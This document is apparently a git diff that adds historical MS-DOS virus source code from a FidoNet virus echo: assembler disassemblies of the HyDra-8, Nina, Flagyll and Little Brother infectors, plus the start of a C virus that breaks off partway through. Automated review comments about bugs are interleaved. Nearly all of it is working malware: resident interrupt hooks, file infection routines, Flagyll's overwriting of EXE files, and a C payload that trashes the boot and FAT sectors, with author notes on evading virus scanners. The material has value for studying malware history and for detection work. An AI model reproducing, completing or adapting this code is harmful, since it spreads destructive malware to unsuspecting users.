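Review bot: This file is an annotated disassembly rather than assembler source, and its comments are in Slovak, but nothing says so: `obsluha 13h:` and `START VIRUSU` sit in the label column as free text, the `loc_N`/`sub_1` names are disassembler-generated, and the closing tagline block (`-+- DinoMail v.1.0 Alpha`, ` + Origin: ...`, `Yoo-hooo-oo`, `--- Aidstest Null: /Kill`) lacks the `;` prefix that every other file in this commit gives those lines. A header should state the form and language, e.g. `; Annotated disassembly listing (comments in Slovak); message subject MICHANGL.A1`, and for an English reader translate the two headings that matter: `MNOZENIE SA` (replication) and `ci je 6. 3.` (asks whether the date is 6 March, the `cmp dx,306h` after `int 1Ah`). Those translations are mine and should be confirmed by a speaker before they go into the file.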
@@ -0,0 +1,266 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 34 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : HYDRA_8.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Doug Bryce, 2:283/718 (06 Nov 94 16:59) +;* To : Brad Frazee +;* Subj : HYDRA_8.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Doug.Bryce@f718.n283.z2.fidonet.org +PAGE 59,132 + +; +; +; HYDRA8 +; +; +; Disassembly by: -=>Wasp<=- aka >>Night Crawler<< +; +; Reassemble with TASM 2.0 +; + +DATA_1E EQU 80H +DATA_16E EQU 1EFH +DATA_17E EQU 1F2H +DATA_18E EQU 9D9AH + +SEG_A SEGMENT BYTE PUBLIC + ASSUME CS:SEG_A, DS:SEG_A + + + ORG 100h + +HYDRA8 PROC FAR + +START: + JMP LOC_2 ; (01E2) + DB 59H, 44H, 00H, 00H +DATA_4 DB 'HyDra-8 Beta - Not For Release' + DB '. *.CO?' + DB 0 +DATA_7 DW 0, 84FCH +DATA_9 DW 0 +DATA_10 DB 0 + DB 29 DUP (0) +DATA_11 DB 0 + DB 0, 0, 0, 0, 0, 0 +DATA_12 DB 0 + DB 0, 0, 0, 0, 0, 0 +COPYRIGHT DB 'Copyright (c)' + DB ' 1991 by C.A.V.E. 
' +DATA_13 DB 2AH + DB 2EH, 45H, 58H, 45H, 00H +DATA_14 DB 33H + DB 0C9H, 1EH, 52H,0E8H, 06H, 00H + DB 0E8H, 13H, 00H,0EBH, 36H, 90H + DB 0BEH, 48H, 01H,0BFH, 5AH, 01H + DB 0B9H, 12H, 00H + +LOCLOOP_1: + XOR BYTE PTR [SI],0F5H + MOVSB ; Mov [si] to es:[di] + LOOP LOCLOOP_1 ; Loop if cx > 0 + + RETN + MOV AX,0F00H + INT 10H ; Video display ah=functn 0Fh + ; get state, al=mode, bh=page + MOV AH,0 + INT 10H ; Video display ah=functn 00h + ; set display mode in al + MOV AX,200H + MOV DH,0CH + MOV DL,1FH + INT 10H ; Video display ah=functn 02h + ; set cursor location in dx + XOR DX,DX ; Zero register + MOV DX,OFFSET DATA_12 + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV AX,200H + MOV DH,18H + MOV DL,0 + INT 10H ; Video display ah=functn 02h + ; set cursor location in dx + RETN + MOV AX,4C00H + INT 21H ; DOS Services ah=function 4Ch + ; terminate with al=return code + ADD [BP+SI-6563H],AH + CMC ; Complement carry + PUSHF ; Push flags + XCHG DH,CH + MOV DI,DATA_18E + DB 9BH,0F5H,0B2H, 94H, 99H, 81H + DB 0CAH,0D1H +LOC_2: + PUSH AX + MOV AX,CS + ADD AX,1000H + XOR DI,DI ; Zero register + MOV CX,1EFH + MOV SI,OFFSET DS:[100H] + MOV ES,AX + REP MOVSB ; Rep when cx >0 Mov [si] to es:[di] + MOV AH,1AH + MOV DX,OFFSET DATA_10 + INT 21H ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + MOV AH,4EH ; 'N' + MOV DX,OFFSET DATA_4+22H + INT 21H ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + JC LOC_6 ; Jump if carry Set +LOC_3: + MOV AH,3DH ; '=' + MOV AL,2 + MOV DX,OFFSET DATA_11 + INT 21H ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + MOV BX,AX + PUSH ES + POP DS + MOV AX,3F00H + MOV CX,0FFFFH + MOV DX,DATA_16E + INT 21H ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + ADD AX,1EFH + MOV CS:DATA_9,AX + CMP WORD PTR DS:DATA_17E,4459H + JNE LOC_4 ; Jump if not equal + MOV AH,3EH ; '>' + INT 21H ; DOS Services ah=function 3Eh + ; close file, bx=file handle + PUSH CS + POP DS + MOV 
AH,4FH ; 'O' + INT 21H ; DOS Services ah=function 4Fh + ; find next filename match + JC LOC_7 ; Jump if carry Set + JMP SHORT LOC_3 ; (0204) +LOC_4: + XOR CX,CX ; Zero register + MOV DX,CX + MOV AX,4200H + INT 21H ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + JC LOC_5 ; Jump if carry Set + MOV AH,40H ; '@' + XOR DX,DX ; Zero register + MOV CX,CS:DATA_9 + INT 21H ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx +LOC_5: + MOV AH,3EH ; '>' + INT 21H ; DOS Services ah=function 3Eh + ; close file, bx=file handle + PUSH CS + POP DS +LOC_6: + MOV AH,1AH + MOV DX,DATA_1E + INT 21H ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + JMP SHORT LOC_10 ; (02B0) + DB 90H +LOC_7: + CLC ; Clear carry flag + XOR CX,CX ; Zero register + PUSH DS + PUSH DX + MOV AH,1AH + MOV DX,OFFSET DATA_10 + INT 21H ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + MOV DX,OFFSET DATA_13 + MOV AH,4EH ; 'N' + XOR CX,CX ; Zero register + INT 21H ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + JC LOC_6 ; Jump if carry Set +LOC_8: + MOV AH,3CH ; '<' + XOR CX,CX ; Zero register + MOV DX,OFFSET DATA_11 + INT 21H ; DOS Services ah=function 3Ch + ; create/truncate file @ ds:dx + MOV BX,AX + JC LOC_6 ; Jump if carry Set + MOV AX,3D02H + MOV DX,OFFSET DATA_11 + INT 21H ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + MOV BX,AX + CLC ; Clear carry flag + XOR DX,DX ; Zero register + MOV AH,40H ; '@' + MOV DX,OFFSET DATA_14 + MOV CX,5AH + INT 21H ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + CMP AX,5AH + JB LOC_9 ; Jump if below + MOV AH,3EH ; '>' + INT 21H ; DOS Services ah=function 3Eh + ; close file, bx=file handle + JC LOC_9 ; Jump if carry Set + MOV AH,4FH ; 'O' + INT 21H ; DOS Services ah=function 4Fh + ; find next filename match + JNC LOC_8 ; Jump if carry=0 +LOC_9: + MOV AX,4C00H + INT 21H ; DOS Services ah=function 4Ch + ; terminate with al=return code +LOC_10: + XOR DI,DI ; Zero register + MOV SI,OFFSET 
DATA_15 + MOV CX,22H + REP MOVSB ; Rep when cx >0 Mov [si] to es:[di] + POP BX + MOV CS:DATA_7,0 + MOV WORD PTR CS:DATA_7+2,ES + POP BX + JMP DWORD PTR CS:DATA_7 +DATA_15 DB 1EH + DB 07H,0B9H,0FFH,0FFH,0BEH,0EFH + DB 02H,0BFH, 00H, 01H, 2BH,0CEH + DB 0F3H,0A4H, 2EH,0C7H, 06H, 00H + DB 01H, 00H, 01H, 2EH, 8CH, 1EH + DB 02H, 01H, 8BH,0C3H, 2EH,0FFH + DB 2EH, 00H, 01H,0CDH + DB 20H + +HYDRA8 ENDP + +SEG_A ENDS + + + + END START + +;-+- FidoPCB v1.4 [NR] +; + Origin: FidoNet * Mathieu Notris * Brussels-Belgium-Europe (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/L Specify library search paths +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir45.asm b/MSDOS/Virus.MSDOS.Unknown.vir45.asm new file mode 100644 index 00000000..c16a0ee1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir45.asm 
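Review bot: At LOC_3 the result of the AH=3Dh open is moved into BX with no JC test, so on a failed open the DOS error code in AX becomes the "handle" used by the following 3Fh read and, at LOC_4, the 40h write and 3Eh close; the `JC LOC_5`/`JC LOC_6` pattern used elsewhere in the routine suggests `JC` after that `INT 21H` was simply omitted, and the listing should at least say so, e.g. `INT 21H ; NOTE: CF not checked — on failure AX (error code) is used as the handle below`. The instructions between the 4Ch `INT 21H` and LOC_2 (`ADD [BP+SI-6563H],AH`, `CMC`, `PUSHF`, `XCHG DH,CH`, `MOV DI,DATA_18E`) are never reached by any visible jump and appear to be data the disassembler decoded as opcodes — plausibly the 0F5h-XORed text that LOCLOOP_1 decodes, since the 5Ah-byte companion image written at LOC_8 starts at DATA_14 and runs through this region. Since the header says "Reassemble with TASM 2.0", those lines should carry a comment such as `; not code: data region misdecoded as instructions — bytes must be kept verbatim on reassembly` so nobody "cleans them up" and breaks the companion stub.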
@@ -0,0 +1,187 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 35 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : NINA.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Daniel Hendry, 2:283/718 (06 Nov 94 17:37) +;* To : Viral Doctor +;* Subj : NINA.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Daniel.Hendry@f718.n283.z2.fidonet.org +.model tiny +.code +org 100h +; Disassembly done by Dark Angel of Phalcon/Skism +; for 40Hex Number 9, Volume 2 Issue 5 +start: + push ax + mov ax,9753h ; installation check + int 21h + mov ax,ds + dec ax + mov ds,ax ; ds->program MCB + mov ax,ds:[3] ; get size word + push bx + push es + sub ax,40h ; reserve 40h paragraphs + mov bx,ax + mov ah,4Ah ; Shrink memory allocation + int 21h + + mov ah,48h ; Allocate 3Fh paragraphs + mov bx,3Fh ; for the virus + int 21h + + mov es,ax ; copy virus to high + xor di,di ; memory + mov si,offset start + 10h ; start at MCB:110h + mov cx,100h ; (same as PSP:100h) + rep movsb + sub ax,10h ; adjust offset as if it + push ax ; originated at 100h + mov ax,offset highentry + push ax + retf + +endfile dw 100h ; size of infected COM file + +highentry: + mov byte ptr cs:[0F2h],0AAh ; change MCB's owner so the + ; memory isn't freed when the + ; program terminates + mov ax,3521h ; get int 21h vector + int 21h + + mov word ptr cs:oldint21,bx ; save it + mov word ptr cs:oldint21+2,es + push es + pop ds + mov dx,bx + mov ax,2591h ; redirect int 91h to int 21h + int 21h + + push cs + pop ds + mov dx,offset int21 + mov al,21h ; set int 21h to virus vector + int 21h + + pop ds ; ds->original program PSP + pop bx + push ds + pop es +return_COM: + mov di,100h ; restore original + mov si,endfile ; file + add si,di ; adjust for COM starting + mov cx,100h ; offset + rep movsb + pop ax + push ds ; jmp back to 
original + mov bp,100h ; file (PSP:100) + push bp + retf +exit_install: + pop ax ; pop CS:IP and flags in + pop ax ; order to balance the + pop ax ; stack and then exit the + jmp short return_COM ; infected COM file +int21: + cmp ax,9753h ; installation check? + je exit_install + cmp ax,4B00h ; execute? + jne exitint21 ; nope, quit + push ax ; save registers + push bx + push cx + push dx + push ds + call infect + pop ds ; restore registers + pop dx + pop cx + pop bx + pop ax +exitint21: + db 0eah ; jmp far ptr +oldint21 dd ? + +infect: + mov ax,3D02h ; open file read/write + int 91h + jc exit_infect + mov bx,ax + mov cx,100h + push cs + pop ds + mov ah,3Fh ; Read first 100h bytes + mov dx,offset endvirus + int 91h + mov ax,word ptr endvirus + cmp ax,'MZ' ; exit if EXE + je close_exit_infect + cmp ax,'ZM' ; exit if EXE + je close_exit_infect + cmp word ptr endvirus+2,9753h ; exit if already + je close_exit_infect ; infected + mov al,2 ; go to end of file + call move_file_pointer + cmp ax,0FEB0h ; exit if too large + ja close_exit_infect + cmp ax,1F4h ; or too small for + jb close_exit_infect ; infection + mov endfile,ax ; save file size + call write + mov al,0 ; go to start of file + call move_file_pointer + mov dx,100h ; write virus + call write +close_exit_infect: + mov ah,3Eh ; Close file + int 91h +exit_infect: + retn + +move_file_pointer: + push dx + xor cx,cx + xor dx,dx + mov ah,42h + int 91h + pop dx + retn + +write: + mov ah,40h + mov cx,100h + int 91h + retn + + db 'Nina' +endvirus: + int 20h ; original COM file + + end start + +;-+- Terminate 1.50/Pro +; + Origin: Rampton Birds' Box, +358-31-3564751, 28.800bps, 24h (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/yx Extended memory swapping +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + 
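Review bot: The size test in infect after `mov al,2 / call move_file_pointer` looks only at AX, but AH=42h returns the new position in DX:AX; DX is discarded, so the `cmp ax,0FEB0h` / `cmp ax,1F4h` bounds and the value stored in `endfile` are the low 16 bits of the file length, and the later `mov si,endfile / add si,di` copy-back is wrong for any host whose length does not fit in 16 bits. A comment at that point would save the next reader a trace: `cmp ax,0FEB0h ; NOTE: only the low word of DX:AX is tested; DX is ignored`. The 3Fh read through `int 91h` that fills `endvirus` is likewise unchecked (neither CF nor AX==100h), so the `'MZ'`/`9753h` marker tests can run against whatever the buffer held before; this is an inference from the missing branch, not something the listing documents.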
diff --git a/MSDOS/Virus.MSDOS.Unknown.vir46.asm b/MSDOS/Virus.MSDOS.Unknown.vir46.asm new file mode 100644 index 00000000..ef031c36 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir46.asm 
@@ -0,0 +1,268 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 36 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : FLAGYLL.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Gilbert Holleman, 2:283/718 (06 Nov 94 17:38) +;* To : Bill Dirks +;* Subj : FLAGYLL.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Gilbert.Holleman@f718.n283.z2.fidonet.org +;FLAGYLL virus - edited for Crypt Newsletter 13 +;FLAGYLL is a memory resident, overwriting virus which +;infects and destroys .EXE files on load. +;It updates the infected files time/date stamps to the time of +;infection so it can easily be followed. +;.EXE's infected by FLAGYLL are destroyed. DOS will either +;refuse to load them or FLAGYLL will become resident +;as they execute. These programs are ruined and can only +;be deleted. Because it is so destructive to files, FLAGYLL cannnot +;pose a threat in the wild, and in this respect, it is much +;inferior to the SUSAN virus included in this issue. 
+ + .radix 16 + cseg segment + model small + assume cs:cseg, ds:cseg, es:cseg + + org 100h + +oi21 equ endflagyll +filelength equ endflagyll - begin +nameptr equ endflagyll+4 +DTA equ endflagyll+8 + + + + + + + +begin: jmp install_flagyll + + + + ; install +install_flagyll: + + mov ax,cs ; reduce memory size + dec ax + mov ds,ax + cmp byte ptr ds:[0000],5a ; check if last memory + jne cancel ; block + mov ax,ds:[0003] + sub ax,100 ; decrease memory + mov ds:0003,ax + + +copy_flagyll: + mov bx,ax ; copy to claimed block + mov ax,es ; PSP + add ax,bx ; virus start in memory + mov es,ax + mov cx,offset endflagyll - begin ; cx = length of virus + mov ax,ds ; restore ds + inc ax + mov ds,ax + lea si,ds:[begin] ; point to start of virus + lea di,es:0100 ; point to destination + rep movsb ; copy virus in memory + + + +hook_21: + + mov ds,cx ; hook interrupt 21h + mov si,0084h ; + mov di,offset oi21 + mov dx,offset check_exec + lodsw + cmp ax,dx ; + je cancel ; exit, if already installed + stosw + movsw + + push es + pop ds + mov ax,2521h ; revector int 21h to virus + int 21h + +cancel: ret + +check_exec: ; look over loaded files + pushf ; for executables + + push es ; push everything onto the + push ds ; stack + push ax + push bx + push dx + + cmp ax,04B00h ; is a file being + ; executed ? 
+ + + jne abort ; no, exit + +do_infect: + call infect ; then try to infect + +abort: ; restore everything + pop dx + pop bx + pop ax + pop ds + pop es + popf + +exit: + ; exit + jmp dword ptr cs:[oi21] + +infect: + jmp over_id ; it's a vanity thing + +note: db '-=[Crypt Newsletter 13]=-' + + +over_id: + + + + mov cs:[name_seg],ds ; this routine + mov cs:[name_off],dx ; essentially grabs + ; the name of the file + cld ; clear direction flags + mov word ptr cs:[nameptr],dx ; save pointer to the filename + mov word ptr cs:[nameptr+2],ds + + mov ah,2Fh ; get old DTA + int 21h + push es + push bx + + push cs ; set new DTA + + pop ds + mov dx,offset DTA + mov ah,1Ah + int 21h + + call host_ident ; find filename for virus + push di + mov si,offset COM_txt ; is extension 'COM' ? + + mov cx,3 + rep cmpsb + pop di + jz return ; if so, let it pass by + mov si,offset EXE_txt ; is extension .EXE ? + nop + mov cl,3 + rep cmpsb + jnz return + + + +do_exe: ; infect host, destroying it + + mov ax,4300h ; clear attributes + mov ds,cs:[name_seg] + mov dx,cs:[name_off] + int 21h + and cl,0FEh + mov ax,4301h + int 21h + + mov ds,cs:[name_seg] ; open file read/write + mov dx,cs:[name_off] + mov ax,3D02h + int 21h + jc close_file + push cs + pop ds + mov [handle],ax + mov bx,ax + + push cs + pop ds + mov ax,4200h ;set pointer to beginning of host + + push cs + pop ds + mov bx,[handle] ;handle to BX + xor cx,cx + xor dx,dx + int 21h + + + + mov ah,40 ;write to file + mov cx,filelength ;virus length in cx + mov dx,100 ;start write at beginning of Flagyll + int 21h ;do it + +close_file: mov bx,[handle] + mov ah,03Eh ;close file, name -->BX + int 21h + + mov ax,4C00h ;exit to DOS + int 21h + + + + +return: mov ah,1Ah + pop dx ; restore old DTA + pop ds + int 21H + + ret ; let DOS regain control + + +host_ident: les di,dword ptr cs:[nameptr] ; finds filename for + mov ch,0FFh ; host selection + mov al,0 + repnz scasb + sub di,4 + ret + + + + +EXE_txt db 'EXE',0 ; extension masks +COM_txt db 
'COM',0 ; for host selection + +name_seg dw ? ;data buffers for +name_off dw ? ; viral use on the fly +handle dw ? + +note2: db 'Flagyll' ; virus name + +endflagyll: + +cseg ends + end begin + +;-+- GEcho 1.10+ +; + Origin: Poeldijk, The Netherlands, Europe, Earth (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/3 Enable 32-bit processing +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir47.asm b/MSDOS/Virus.MSDOS.Unknown.vir47.asm new file mode 100644 index 00000000..3a2b70d8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir47.asm 
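Review bot: In do_exe the `jc close_file` after the 3D02h open jumps past the `mov [handle],ax`, so a failed open closes whatever word `[handle]` currently holds (the stale handle of an earlier victim, or the uninitialised value carried in the resident image) and then terminates via 4C00h anyway; a comment such as `jc close_file ; NOTE: [handle] not yet assigned — closes a stale handle on open failure` makes the behaviour explicit. Note also that both the 4300h/4301h attribute calls and the 40h write ignore CF, and that the `mov ax,4C00h / int 21h` at the end of close_file is issued from inside the int 21h hook, so as far as the visible code shows it terminates the *caller* of the 4B00h exec rather than returning to it — the header text ("DOS will either refuse to load them or FLAGYLL will become resident") should mention this. The `.EXE` test at do_exe also compares against `EXE_txt` without any case handling, which the DTA-based filename lookup in host_ident does not address either; that is an observation, not a proposed change.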
@@ -0,0 +1,247 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 37 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : LTBRO299.DSM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Alan Jones, 2:283/718 (06 Nov 94 17:40) +;* To : Daniel Hendry +;* Subj : LTBRO299.DSM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Alan.Jones@f718.n283.z2.fidonet.org +;Little Brother - resident companion virus, 299 bytes. + +;This virus stores itself inside DOS's data block, over the root directory +;copy. It hooks int 21h, function 4bh (subfunct. 0, load & exec) and +;creates a function 0deh for self identification. When a file is run, +;it first checks to see if it is a COM or an EXE. If it is an EXE, it +;will create a COM file with the same filename. Otherwise - if it is a +;COM, it will check to see if it is the virus by checking the size of the +;file and seeing if there is an EXE with the same (starting) filename. +;If so, it will change the filename to be run to the EXE host and allow +;DOS to execute it. This virus may cause errors (?) due to the place +;in memory it locates itself. + +;Disassembly by Black Wolf. + +.model tiny +.code + org 100h + +start_virus: + cld + mov ax,0DEDEh ;Installation Check + int 21h + cmp ah,41h + je Exit_Virus ;If there - terminate + + mov ax,44h + mov es,ax + mov di,100h ;Copy virus to 0044:0100 + mov si,di ;Root directory entries? + mov cx,end_virus-start_virus ;This is inside DOS data + rep movsb ;block... may cause errors? + + mov ds,cx ;DS = 0 = Interrupt table + mov si,84h ;0:84h = Int 21h entry in table + + mov di,offset Old21_IP ;Save old Int 21h address + movsw + movsw + + push es + pop ds ;Set DS to new seg... + + mov dx,offset Int21_Handler + mov ax,2521h + int 21h ;Hook Int 21h. 
+ +Exit_Virus: + retn ;Terminate + + +EXE_Mask db 'EXE',0 +COM_Mask db 'COM',0 + +CritErrHandler: + mov al,3 + iret + +Int21_Handler: + pushf + cmp ax,0DEDEh ;Is this an installation + je Install_Check ;check call? + + push dx bx ax ds es ;Save regs.... + + cmp ax,4B00h ;Is it load and execute? + jne Exit_21h ;No... exit handler + call Infect_File ;Yes... infect file + +Exit_21h: + pop es ds ax bx dx + popf + jmp dword ptr cs:[Old21_IP] ;Jump to Old Int 21h + +Install_Check: + mov ax,4101h + popf + iret + +Infect_File: + cld + mov word ptr cs:[Filename_off],dx ;Save filename offset + mov word ptr cs:[Filename_seg],ds ;and segment. + push cs + pop ds + mov dx,offset VirusDTA + mov ah,1Ah + int 21h ;Set DTA to us... + + call Find_Extension + + mov si,offset ds:[EXE_Mask] + mov cx,3 + repe cmpsb ;Is it an EXE file? + jnz Not_EXE + + mov si,offset COM_Mask + call Change_Ext ;Change extension to COM + + mov ax,3300h + int 21h ;Get Ctrl-Break Status + push dx ;Save it.... + + xor dl,dl + mov ax,3301h + int 21h ;Disable Ctrl-Break. + + mov ax,3524h + int 21h ;Get Int 24h handler's address + + push bx + push es ;Save it for later... + + push cs + pop ds ;DS = virus segment + + mov dx,offset CritErrHandler + mov ax,2524h + int 21h ;Set Critical Error handler. + + + lds dx,dword ptr ds:[Filename_Off] ;DS:DX = filename + xor cx,cx ;Reg attributes + mov ah,5Bh + int 21h ;Create File.. + jc Done_Infect + + xchg ax,bx + push cs + pop ds + + mov cx,end_virus-start_virus + mov dx,100h + mov ah,40h + int 21h ;Write entire virus + + cmp ax,cx ;did it all write? + + pushf + mov ah,3Eh ;Close file. + int 21h + popf + + jz Done_Infect ;Yes, go Done_Infect + + lds dx,dword ptr ds:[Filename_Off] + mov ah,41h + int 21h ;Delete file, incomplete + ;write or write error. + +Done_Infect: + pop ds + pop dx + mov ax,2524h + int 21h ;Restore Critical error handler + + pop dx ;Get old CTRL-Break handler + mov ax,3301h ;status and restore it. 
+ int 21h + + mov si,offset EXE_Mask + call Change_Ext ;Change extension back to orig. + +Leave_Infect: + retn + +Not_EXE: + call Locate_File + cmp word ptr cs:[24dh], end_virus-start_virus + jne Leave_Infect ;Is the file size right for Virus? + + mov si,offset EXE_Mask ;If so, is there an EXE of the same + call Change_Ext ;name as the COM file? + call Locate_File + jnc Leave_Infect ;If not exit, otherwise - is already + mov si,offset COM_Mask ;infected, so change extension + jmp short Change_Ext ;to run uninfected program. + + +Locate_File: + lds dx,dword ptr ds:[Filename_Off] + mov cl,27h + mov ah,4Eh + int 21h ;Find First Filename match. + retn + + +Change_Ext: + call Find_Extension + push cs + pop ds + movsw + movsw + retn + +Find_Extension: + les di,dword ptr cs:[Filename_Off] + mov ch,0FFh + mov al,2Eh ;Scan through filename until a '.' + repne scasb + retn + +Virus_Name db 'Little Brother',0 + +end_virus: + +Old21_IP dw ? +Old21_CS dw ? + +Filename_Off dw ? +Filename_Seg dw ? + +VirusDTA: +end start_virus + +;-+- FMail 0.96 +; + Origin: **SERMEDITECH BBS** Soissons FR (+33) 23.73.02.51 (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/v Include full symbolic debug information +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir48.c b/MSDOS/Virus.MSDOS.Unknown.vir48.c new file mode 100644 index 00000000..273c5820 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir48.c 
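Review bot: The comments on the branch after the second `call Locate_File` in Not_EXE read inverted: `jnc` is taken when the find-first for the `.EXE` name *succeeds*, and at that point Change_Ext has already rewritten the caller's filename buffer (via `les di,[Filename_Off]`) to `.EXE`, so leaving means DOS runs the EXE host; the carry path is the "no EXE exists" case that restores `.COM`. Suggested wording: `jnc Leave_Infect ; EXE host found: name already reads .EXE, let DOS run it` and `mov si,offset COM_Mask ; no EXE: restore .COM extension`. The `cmp word ptr cs:[24dh], end_virus-start_virus` check hard-codes `VirusDTA+1Ah` (the low word of the find-first size field); any byte added to the image silently moves it, so it should be written as `cmp word ptr cs:[VirusDTA+1Ah], end_virus-start_virus` or at least carry `; = VirusDTA+1Ah, DTA file-size low word`. Worth stating in the header too: Change_Ext modifies the executing program's own filename string in place, which is how the redirect to the host works.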
@@ -0,0 +1,255 @@ +/* PVT.VIRII (2:465/65.4) PVT.VIRII + Msg : 38 of 54 + From : MeteO 2:5030/136 Tue 09 Nov 93 09:15 + To : - *.* - Fri 11 Nov 94 08:10 + Subj : CVIRUS21.C + +.RealName: Max Ivanov + +* Kicked-up by MeteO (2:5030/136) +* Area : VIRUS (Int: p p) +* From : Clif Jessop, 2:283/718 (06 Nov 94 17:40) +* To : Mike Salvino +* Subj : CVIRUS21.C + +@RFC-Path: +ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +18.n283!not-for-mail +@RFC-Return-Receipt-To: Clif.Jessop@f718.n283.z2.fidonet.org + C-Virus: A generic .COM and .EXE infector + Written by Nowhere Man + October 2, 1991 + Version 2.1 + */ + +#include +#include +#include +#include +#include + + + /* Note that the #define TOO_SMALL is the minimum size of the .EXE or .COM + file which CVIRUS can infect without increasing the size of the + file. (Since this would tip off the victim to CVIRUS's presence, no + file under this size will be infected.) It should be set to the + approximate size of the LZEXEd .EXE file produced from this code, but + always a few bytes larger. Why? Because this way CVIRUS doesn't need + to check itself for previous infection, saving time. + + SIGNATURE is the four-byte signature that CVIRUS checks for to prevent + re-infection of itself. + */ + +#ifdef DEBUG +#define TOO_SMALL 6000 +#else +#define TOO_SMALL 4735 +#endif + +#define SIGNATURE "NMAN" + + /* The following is a table of random byte values. Be sure to constantly + change this to prevent detection by virus scanners, but keep it short + (or non-exsistant) to keep the code size down. + */ + + char screw_virex[] = "\xF5\x23\x72\x96\x54\xFA\xE3\xBC\xCD\x04"; + +void hostile_activity(void) +{ + /* Put whatever you feel like doing here... + I chose to make this routine trash the victim's boot, FAT, + and directory sectors, but you can alter this code however you want, + and are encouraged to do so. 
+ */ + + +#ifdef DEBUG + puts("\aAll files infected!"); + exit(1); +#else + + /* Overwrite five sectors, starting with sector 0, on C:, with the + memory at location DS:0000 (random garbage). + */ + + abswrite(2,5,0,(void *) 0); + __emit__(0xCD, 0x19); // Reboot computer + +#endif + +} + +int infected(char *fname) +{ + /* This function determines if fname is infected. It reads four + bytes 28 bytes in from the start and checks them agains + the current header. 1 is returned if the file is already infected, + 0 if it isn't. + */ + + register int handle; + char virus_signature[35]; + static char check[] = SIGNATURE; + + handle = _open(fname, O_RDONLY); + _read(handle, virus_signature, + sizeof(virus_signature)); + close(handle); + +#ifdef DEBUG + printf("Signature for %s: %.4s\n", fname, &virus_signature[28]); +#endif + + /* This next bit may look really stupid, but it actually saves about + 100 bytes. + */ + + return((virus_signature[30] == check[2]) && (virus_signature[31] == +check[3])); +} + +void spread(char *virus, struct ffblk *victim) +{ + /* This function infects victim with virus. First, the victim's + attributes are set to 0. Then the virus is copied into the victim's + file name. Its attributes, file date/time, and size are set to that + of the victim's, preventing detection, and the files are closed. 
